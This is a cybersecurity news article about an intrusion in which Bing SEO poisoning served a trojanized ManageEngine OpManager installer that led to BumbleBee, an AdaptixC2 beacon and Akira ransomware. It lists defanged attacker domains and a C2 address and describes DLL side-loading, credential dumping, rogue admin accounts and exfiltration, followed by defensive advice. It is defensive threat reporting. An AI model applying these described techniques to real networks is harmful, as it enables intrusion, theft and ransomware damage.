Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Microsoft Teams Blocks Uninvited Bots From Meetings
July 1, 2026
Anthropic Claude AI Reportedly Uses Hidden Code to Detect Chinese Users
July 1, 2026
US Eases Export Restrictions on Claude Fable 5 and Mythos 5 AI Models
July 1, 2026
Home/Threats/Bing Search Results Lead to Akira Ransomware via ManageEngine OpManager
Threats

Bing Search Results Lead to Akira Ransomware via ManageEngine OpManager

Key Takeaways Threat actors leveraged SEO poisoning on Bing to distribute a malicious installer disguised as ManageEngine OpManager. The attack chain deployed BumbleBee malware and an AdaptixC2...

Marcus Rodriguez
Marcus Rodriguez
July 1, 2026 4 Min Read
3 0

Key Takeaways

  • Threat actors leveraged SEO poisoning on Bing to distribute a malicious installer disguised as ManageEngine OpManager.
  • The attack chain deployed BumbleBee malware and an AdaptixC2 beacon, culminating in Akira ransomware across the victim’s network.
  • The intrusion involved sophisticated lateral movement, credential theft (including Active Directory database exfiltration), and data theft, with over 75GB exfiltrated.
  • The entire operation, from initial compromise to ransomware deployment, took approximately 44 hours.
  • This incident highlights the critical need for vigilance against search engine manipulation and robust endpoint security measures.

A sophisticated ransomware attack has been traced back to a seemingly innocuous Bing search for a common IT administration tool. Threat actors exploited search engine optimization (SEO) poisoning to insert a counterfeit download link high in Bing’s results, leading an unsuspecting IT administrator to install malware instead of legitimate software. This incident underscores a growing concern: everyday search activities can inadvertently become the initial vector for a severe network breach.

Table Of Content

  • Key Takeaways
  • ManageEngine OpManager Delivers Akira Ransomware
  • AdaptixC2, Lateral Movement, and Data Exfiltration
  • What You Should Do

The infiltration began in July 2025 when a user initiated a Bing search for “ManageEngine OpManager,” a widely utilized network monitoring solution. Instead of being directed to the official vendor website, the user landed on a meticulously crafted imposter domain. This deceptive site then delivered a trojanized Microsoft Installer (MSI) package, setting in motion a multi-day intrusion that ultimately resulted in the deployment of Akira ransomware throughout the victim’s network.

Detailed analysis of this intrusion was published by The DFIR Report in a report released on June 29, 2026, in collaboration with Swisscom B2B CSIRT. The report identifies BumbleBee malware and an AdaptixC2 beacon as primary tools used by the attackers to maintain persistent access and navigate the compromised environment.

The attackers demonstrated remarkable patience and precision. They established fraudulent administrative accounts, installed remote access software as a Windows service for stealthy persistence, extracted the Active Directory database, and exfiltrated more than 75GB of sensitive data to a server located in Ukraine. The entire sequence, from the initial click on the malicious link to the full-scale ransomware deployment, was executed in approximately 44 hours.

The impact was devastating. The Akira ransomware, identified as locker.exe, utilized Windows Management Instrumentation (WMI) to erase Volume Shadow Copies before encrypting critical systems. To ensure complete network paralysis, the threat actor returned two days later to encrypt a child domain, leaving no segment of the network unaffected.

ManageEngine OpManager Delivers Akira Ransomware

The infection originated from opmanager[.]pro, a fraudulent domain that achieved high visibility in Bing search results through SEO poisoning. This site meticulously mimicked the authentic ManageEngine download page, subsequently redirecting victims to download-center[.]online, where the malicious MSI installer was served to the target machine.

Upon execution, the ManageEngine-OpManager.msi installer dropped three distinct files into a temporary directory: the legitimate OpManager software (acting as a decoy), consent.exe (a standard Windows binary), and the BumbleBee loader, disguised as msimg32.dll. This loader exploited the Windows DLL search order to execute covertly within a trusted process, significantly hindering detection by conventional security solutions.

The MSI package itself was signed with a revoked code-signing certificate issued to “LLC Resource+,” an entity previously linked to BumbleBee malware distribution. The strategic choice to impersonate a ManageEngine installer was deliberate, as IT administrators, who typically manage such tools, possess elevated system privileges, making them prime targets for initial access and broader network compromise.

AdaptixC2, Lateral Movement, and Data Exfiltration

Approximately five hours post-infection, BumbleBee deployed AdgNsy.exe, a renamed version of the legitimate Windows Address Book utility, which was injected with AdaptixC2 shellcode. This established a persistent command-and-control (C2) channel to 172.96.137[.]160, enabling the attacker to commence internal network reconnaissance and identify critical assets, including domain controllers.

The attackers then created two unauthorized domain accounts, backup_DA and backup_EA. Crucially, backup_EA was elevated to the Enterprise Admins group, granting the attackers complete control over the entire Active Directory forest. Subsequently, RustDesk remote access software was installed as a Windows service on multiple servers, ensuring continued access even if other C2 channels were disrupted.

On the second day of the intrusion, the attacker gained access to a domain controller via RDP and extracted the NTDS.dit Active Directory database using wbadmin.exe. Credentials for Veeam were also siphoned from a PostgreSQL database, and LSASS memory was dumped across several hosts. To further evade detection and firewall restrictions, a reverse SSH tunnel was established, routing RDP traffic through an external server.

What You Should Do

  • Verify Software Downloads: Always download software directly from official vendor websites. Cross-reference download links and digital signatures before execution.
  • Enhance Search Engine Vigilance: Be highly skeptical of search results, especially for critical enterprise software. Look for official domains and scrutinize URLs for subtle typos or unusual top-level domains.
  • Implement Strong Endpoint Detection and Response (EDR): Utilize EDR solutions to detect anomalous process behavior, DLL side-loading attempts, and unexpected executable drops.
  • Monitor for Rogue Accounts and Privilege Escalation: Implement alerts for the creation of new administrative accounts or unexpected additions to highly privileged groups (e.g., Enterprise Admins, Domain Admins).
  • Control MSI Execution: Configure Group Policies or endpoint security to restrict the execution of MSI installers from untrusted or network locations.
  • Enforce DLL Load Order Controls: Implement controls to mitigate DLL search order hijacking, preventing malicious DLLs from being loaded by legitimate processes.
  • Audit Remote Access Tools: Monitor for the installation or registration of remote access software (like RustDesk) as Windows services, as this is a common persistence mechanism for attackers.
  • Regularly Backup and Isolate Data: Maintain regular, immutable backups of critical data, and ensure these backups are stored offline or in isolated environments to prevent ransomware encryption.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitMalwareransomwareSecurityThreat

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

Critical Progress Kemp LoadMaster Bug Allows Pre-Auth Remote Code Execution

Next Post

SystemBC Malware Conceals C2 Traffic for Persistent Access

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Cisco Unified CM and SME Flaw Lets Attackers Launch SSRF Attacks
July 1, 2026
TONResolver Malware Abuses TON Smart Contracts for C2 Switching
July 1, 2026
Critical WhatsApp Web DLL Sideloading Flaw Lets Attackers Hijack Sessions for CEO Fraud
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us